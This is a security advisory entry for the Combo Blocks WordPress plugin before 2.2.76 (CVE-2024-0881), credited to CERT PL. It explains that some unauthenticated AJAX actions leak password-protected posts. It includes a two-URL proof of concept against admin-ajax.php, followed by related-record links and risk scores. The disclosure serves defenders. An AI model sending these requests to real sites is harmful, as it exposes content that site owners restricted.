Lucene search
Krzysztof Zając (CERT PL)WPVDB-ID:E460E926-6E9B-4E9F-B908-BA5C9C7FB290HistoryMar 19, 2024 - 12:00 a.m.
Combo Blocks < 2.2.76 - Unauthenticated Password Protected Posts Access
2024-03-1900:00:00
Krzysztof Zając (CERT PL)
wpscan.com
17
combo blocks
unauthenticated access
password protection
ajax
vulnerability
Description The plugin does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
PoC
Open one of the below URL as an unauthenticated user and note that password protected posts are disclosed in it (when the blog has such posts) https://example.com/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free https://example.com/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free
Related
cve
cve
CVE-2024-0881
2024-04-11 16:15:24
nuclei
nuclei
Combo Blocks < 2.2.76 - Improper Access Control
2024-05-01 14:27:37
nvd
nvd
CVE-2024-0881
2024-04-11 16:15:24
cvelist
cvelist
wpexploit
wpexploit
Combo Blocks < 2.2.76 - Unauthenticated Password Protected Posts Access
2024-03-19 00:00:00
vulnrichment
vulnrichment
AI Score
6.7
Confidence
High
EPSS
0.001
Percentile
21.4%
Related for WPVDB-ID:E460E926-6E9B-4E9F-B908-BA5C9C7FB290